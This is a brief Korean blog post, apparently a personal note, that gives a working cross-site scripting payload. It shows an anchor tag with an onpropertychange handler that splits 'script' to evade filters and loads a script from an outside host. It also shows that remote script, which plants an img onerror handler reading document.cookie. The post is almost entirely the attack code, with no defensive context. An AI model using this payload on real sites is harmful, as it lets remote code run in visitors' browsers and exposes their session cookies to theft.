ㅇ createElement(), getElementById(), appendChild(), innerHTML() 이용,
자바스크립트 사용 - for XSS
ㅇ 사이트 입력
<center id=xcuter></center><a onpropertychange='var x="scr"+"ipt"; var xcu=document.createElement(x); xcu.src="http://youngsam.kr/xss";document.getElementById("xcuter").appendChild(xcu);' href="xcuter"></a>
ㅇ http://youngsam.kr/xss 의 내용
document.getElementById("xcuter").innerHTML = '<img src="" onerror="alert(document.cookie)"';
영삼넷
Categories
Recent Posts
Recent Comments
Statistics
- Total Visitors:
- 371155
- Today:
- 684784
- Yesterday:
- 9751027
IT강국 김영삼 블로그에 오신걸 진심으로 환영합니다.
©2002 영삼넷 // openkr
©2002 영삼넷 // openkr